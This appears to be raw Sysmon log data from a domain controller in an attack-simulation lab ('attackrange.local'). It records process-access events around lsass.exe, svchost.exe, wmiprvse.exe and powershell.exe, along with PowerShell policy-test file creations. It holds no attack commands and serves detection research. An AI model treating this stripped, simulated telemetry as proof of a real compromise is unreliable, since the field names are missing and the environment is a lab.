16:53:45.607{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.607{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.575{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.575{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002239768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.545{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000002239767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:45.545{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320\PSHost.132591776254041527.5320.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.529{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.529{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002239764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.529{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ijaqaqvr.f5y.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002239763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.529{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nkado1sk.mfr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002239762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.513{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_nkado1sk.mfr.ps12021-03-02 16:53:45.513 10341000x80000000000000002239761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.498{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-AEAA-00000000AD01}14936C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ACAA-00000000AD01}4592C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-AAAA-00000000AD01}14736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 